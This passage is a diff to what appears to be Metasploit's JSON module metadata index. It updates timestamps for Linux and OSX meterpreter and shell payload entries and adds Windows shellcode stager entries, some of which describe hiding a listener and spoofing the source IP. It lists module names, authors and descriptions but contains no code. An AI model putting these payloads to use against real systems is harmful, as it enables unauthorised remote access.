-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -182825,7 +185347,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -182861,7 +185383,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -182965,7 +185487,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -183001,7 +185523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -183037,7 +185559,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -183105,7 +185627,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/armle/adduser.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/adduser",
@@ -183139,7 +185661,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/armle/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/exec",
@@ -183246,7 +185768,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -183282,7 +185804,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -183318,7 +185840,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -183492,7 +186014,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -183528,7 +186050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -183564,7 +186086,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -183671,7 +186193,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -183707,7 +186229,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -183743,7 +186265,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -183992,7 +186514,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -184028,7 +186550,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -184064,7 +186586,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -184242,7 +186764,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -184278,7 +186800,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -184314,7 +186836,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -184554,7 +187076,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -184590,7 +187112,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -184626,7 +187148,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -184662,7 +187184,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -184698,7 +187220,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -184734,7 +187256,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -184769,7 +187291,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-04-12 17:26:46 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x64/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/exec",
@@ -184876,7 +187398,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -184912,7 +187434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -184948,7 +187470,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -184982,7 +187504,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/pingback_bind_tcp",
@@ -185016,7 +187538,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/pingback_reverse_tcp",
@@ -185119,7 +187641,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_ipv6_tcp",
@@ -185187,7 +187709,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-04-03 12:04:32 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_tcp_random_port",
@@ -185255,7 +187777,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_reverse_ipv6_tcp",
@@ -185325,7 +187847,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x86/adduser.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/adduser",
@@ -185359,7 +187881,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x86/chmod.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/chmod",
@@ -185395,7 +187917,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-11 19:11:34 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x86/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/exec",
@@ -185791,7 +188313,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -185827,7 +188349,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -185863,7 +188385,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -185965,7 +188487,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x86/read_file.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/read_file",
@@ -186559,7 +189081,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_reverse_tcp_ipv6",
@@ -186595,7 +189117,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -186631,7 +189153,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -186667,7 +189189,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -187604,7 +190126,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -187640,7 +190162,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -187676,7 +190198,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-09-16 18:20:06 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -187916,7 +190438,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/osx/x86/exec.rb",
    "is_install_path": true,
    "ref_name": "osx/x86/exec",
@@ -189917,6 +192439,1028 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_windows/custom/bind_hidden_ipknock_tcp": {
+    "name": "Windows shellcode stage, Hidden Bind Ipknock TCP Stager",
+    "fullname": "payload/windows/custom/bind_hidden_ipknock_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_hidden_ipknock_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_hidden_tcp": {
+    "name": "Windows shellcode stage, Hidden Bind TCP Stager",
+    "fullname": "payload/windows/custom/bind_hidden_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_hidden_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_ipv6_tcp": {
+    "name": "Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)",
+    "fullname": "payload/windows/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_ipv6_tcp_uuid": {
+    "name": "Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/windows/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_named_pipe": {
+    "name": "Windows shellcode stage, Windows x86 Bind Named Pipe Stager",
+    "fullname": "payload/windows/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_nonx_tcp": {
+    "name": "Windows shellcode stage, Bind TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/custom/bind_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_tcp": {
+    "name": "Windows shellcode stage, Bind TCP Stager (Windows x86)",
+    "fullname": "payload/windows/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_tcp_rc4": {
+    "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_tcp_uuid": {
+    "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/windows/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/find_tag": {
+    "name": "Windows shellcode stage, Find Tag Ordinal Stager",
+    "fullname": "payload/windows/custom/find_tag",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "skape <mmiller@hick.org>"
+    ],
+    "description": "Custom shellcode stage. Use an established connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/findtag_ord.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/find_tag",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_hop_http": {
+    "name": "Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager",
+    "fullname": "payload/windows/custom/reverse_hop_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "scriptjunkie <scriptjunkie@scriptjunkie.us>",
+      "bannedit <bannedit@metasploit.com>",
+      "hdm <x@hdm.io>"
